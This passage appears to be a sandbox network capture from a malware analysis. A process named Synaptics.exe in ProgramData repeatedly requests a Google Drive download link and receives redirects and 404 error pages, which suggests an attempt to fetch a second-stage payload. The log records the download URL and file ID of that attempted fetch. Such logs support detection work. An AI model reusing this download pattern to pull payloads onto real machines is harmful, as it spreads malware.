                                                                                                                                                                2024-12-25 08:08:51 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                2024-12-25 08:08:51 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 59 55 4a 49 59 51 75 65 44 39 7a 4f 5f 48 53 30 30 72 43 65 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="GYUJIYQueD9zO_HS00rCeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                2024-12-25 08:08:51 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                69192.168.2.450104142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:53 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:53 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:53 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-3UrmKGaatqnFv8YX-Odumg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                70192.168.2.450105142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:53 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:53 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:53 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-SdZp76wx6hpuHY4cGcA53g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                71192.168.2.450115142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:55 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:56 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC6kNIlWYuOmH-ZCoFzgG9Nfq3M8yaCOsl9KxyRziScypP-sdgJZA_pO8QWG2r5eebemE09wKuo
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:56 GMT
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-SxSJcccvBBdaMxUzMPw-fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:56 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                2024-12-25 08:08:56 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 4e 6f 37 4c 62 6d 4a 30 53 75 68 51 39 66 50 61 39 52 36 6f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="KNo7LbmJ0SuhQ9fPa9R6og">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                2024-12-25 08:08:56 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                72192.168.2.450116142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:55 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:56 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-FDeiD_WfDfaZyqGwA3hYwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                73192.168.2.450117142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:55 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:56 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC6k15TExYxAAz5b6FPdRy3MLZSvIkscNz90wl_eCY6vjUNifMflN6K4jOEL6w-fY8Gc
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:56 GMT
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-jCw2YMIf9q4Mv9tI9t0CrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:56 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:08:56 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 34 64 52 6b 31 44 5f 34 37 4d 35 76 62 39 36 2d 46 73 49 63 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="N4dRk1D_47M5vb96-FsIcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:08:56 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                74192.168.2.450118142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:55 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:56 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-LdOvF3yUVi2eci1owtomqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                75192.168.2.450130142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:58 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:59 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:59 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-erZK-jGWjQvdIGWbePu3Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                76192.168.2.450129142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:58 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
